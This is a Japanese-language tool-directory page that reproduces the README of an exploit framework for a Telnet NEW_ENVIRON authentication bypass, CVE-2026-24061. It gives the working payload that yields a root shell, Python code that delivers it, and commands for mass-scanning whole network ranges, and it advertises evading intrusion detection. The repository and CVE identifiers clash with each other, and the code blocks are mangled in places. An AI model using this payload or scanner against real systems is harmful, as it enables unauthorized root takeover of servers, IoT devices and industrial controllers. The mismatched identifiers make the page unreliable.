Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/ridpath/terrminus-cve-2026-2406
特権昇格偵察脆弱性スキャナーIoTセキュリティエクスプロイトSCADA/ICSセキュリティ情報収集ウェブセキュリティネットワークセキュリティペネトレーションテストレッドチーミング
GitHubridpath/terrminus-cve-2026-2406

Terrminus-CVE-2026-2406

AsyncIOスキャナー&エクスプロイトフレームワーク for CVE-2026-24061(Telnet NEW_ENVIRON 認証バイパス)。高並行ディスカバリ、パッシブフィンガープリンティング、および認可されたrootシェル昇格を特徴とします。

リポジトリを見る
2298ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Terminus - CVE-2026-24061 スキャナ & エクスプロイトフレームワーク

CVE-2026-24061 Telnet NEW_ENVIRON 認証バイパスおよび権限昇格脆弱性のためのセキュリティ解析エンジン。

Terminus


概要

Terminus は、CVE-2026-24061 の認定ペネトレーションテストおよび脆弱性評価のために設計されたプロフェッショナルなセキュリティ調査ツールです。この重大な脆弱性はレガシー Telnet デーモン実装に影響を与え、未認証のリモート攻撃者が認証をバイパスして root レベルのアクセスを取得することを可能にします。

CVE-2026-24061 とは?

CVE-2026-24061 は、RFC 1572 (Telnet 環境オプション) をサポートする Telnet サービスにおけるリモートコード実行脆弱性です。この脆弱性は、NEW_ENVIRON サブネゴシエーション中の USER 環境変数の不適切なサニタイズを悪用します:

  • 通常の認証: USER=john → パスワードを要求
  • エクスプロイトペイロード: USER=-f root → 認証をバイパスし、root シェルを付与

影響:

  • 完全な認証バイパス (パスワード不要)
  • root への即時権限昇格
  • システム全体の完全な侵害

影響を受けるサービス:

  • レガシー Telnet GNU Inetutils telnetd (具体的には 2.7 までのバージョン)
  • 脆弱な Telnet 実装を含む IoT ファームウェア
  • 古い Telnet サービスを備えた産業用制御システム

主な機能

大規模脆弱性スキャナ

  • 高並行スキャン: AsyncIO を使用して 1,000 以上のターゲットを同時にスキャン
  • CIDR サポート: ネットワーク範囲全体をスキャン (192.168.0.0/24、10.0.0.0/8)
  • 二重検出モード:
    • パッシブ (デフォルト): 高速、安全、シグネチャベースの検出
    • アクティブ検証 (--verify): エクスプロイトの証明、uid=0 root アクセスを確認
  • バナー解析: デーモンの種類とバージョンをフィンガープリント
  • リスクスコアリング: 多層的な信頼度評価 (CRITICAL、HIGH、MEDIUM、LOW)

RFC 準拠プロトコルエンジン

  • TerminusNegotiator クラス: Telnet プロトコル操作のためのクリーンな API
    • Terminus.handshake() - RFC 854 準拠のハンドシェイク
    • Terminus.exploit() - CVE-2026-24061 ペイロード配信
  • 適切なオプションネゴシエーション: プロトコル準拠による IDS/IPS 検出の回避
  • 状態機械: IAC シーケンス (DO/DONT/WILL/WONT/SB/SE) の堅牢な処理

認可ゲート付きエクスプロイト

  • 対話型シェル: root アクセスを備えた完全なポストエクスプロイトシェル
  • コマンド実行: 単一コマンドを実行して出力をキャプチャ
  • 証拠収集: uid、環境変数、システム情報を収集
  • 安全機構:
    • 明示的な --exploit フラグが必要
    • バッチスキャンモードでは無効
    • すべてのエクスプロイト試行の監査ログ

マルチフォーマットレポート

  • ターミナル: 色分けされたリスクレベル付きのリッチフォーマットテーブル
  • JSON: SIEM/SOAR 統合
  • CSV: スプレッドシート追跡
  • HTML: 統計付きの詳細レポート
  • Markdown: ドキュメントに適した出力

アーキテクチャ

コアエンジン: TerminusNegotiator

Terminus の中核は TerminusNegotiator クラスであり、プロトコル処理とエクスプロイトロジックの明確な分離を提供します:```python from terminus import TerminusNegotiator

Initialize engine

negotiator = TerminusNegotiator()

Step 1: RFC 854 compliant handshake

await negotiator.handshake(target="192.168.1.100", port=23)

Step 2: Deliver CVE-2026-24061 payload

result = await negotiator.exploit(payload="-f root")

if result.success: print(f"Root shell acquired: {result.evidence['uid']}")

### エンジン方式とスクリプト方式

**従来のスクリプト**(既存ツール):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell

Terminusエンジン:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report

---

## インストール

### 必要条件
- **Python 3.10以上**
- **対応プラットフォーム:**
  - Windows 10/11 (PowerShell)
  - Windows + WSL2 (Kali Linux、Parrot OS、Ubuntu)
  - ネイティブLinux (Kali、Parrot、Ubuntu、Debian)
  - macOS (Python 3.10以上)

### クイックスタート (全プラットフォーム)

#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git

# Run setup script
.\setup_env.ps1

# Activate virtual environment
.venv\Scripts\Activate.ps1

# Verify installation
terminus --version

Linux / WSL2 / macOS(Bash)```bash

Clone repository

git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406

Run setup script

chmod +x setup_env.sh ./setup_env.sh

Activate virtual environment

source venv/bin/activate

Verify installation

terminus --version

#### 手動インストール(全プラットフォーム)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Create virtual environment
python3 -m venv venv

# Activate (Linux/macOS/WSL)
source venv/bin/activate

# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1

# Install dependencies
pip install -e .

# Verify
terminus --version

依存関係(クロスプラットフォーム)

  • telnetlib3 - AsyncIO Telnet プロトコル実装
  • rich - ターミナル UI とフォーマット(Windows/Linux での ANSI サポート)
  • pydantic - データ検証とモデル
  • aiofiles - 非同期ファイル I/O
  • jinja2 - レポートテンプレート
  • pyyaml - 設定管理
  • pathlib - クロスプラットフォームのパス処理(組み込み)

注記: すべての依存関係は純粋な Python であるか、クロスプラットフォーム対応のホイールを備えています。プラットフォーム固有のコンパイルは不要です。


シェル補完(オプション)

コマンド入力を高速化するためのタブ補完を有効にします:

Bash```bash

_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc

### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc

Fish```bash

_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish

### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression

テストしてみる:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.

---

## 使用方法

### スキャンモード

#### 単一ターゲットスキャン```bash
terminus scan -t 192.168.1.100

CIDR レンジスキャン```bash

terminus scan -t 192.168.1.0/24

#### ファイルベースのバッチスキャン```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500

高並行ネットワークスキャン```bash

terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200

### 検出モード

#### パッシブ検出(デフォルト - 安全)```bash
terminus scan -t target.com --passive-only

積極的検出(全ヒューリスティック)```bash

terminus scan -t target.com --aggressive

#### アクティブ検証モード(エクスプロイトの実証)```bash
terminus scan -t 192.168.1.100 --verify

Usage

ライブデモンストレーション

バージョンの確認:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db

**パッシブスキャン(デフォルト - 保守的なリスク評価):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323
ツールをダウンロード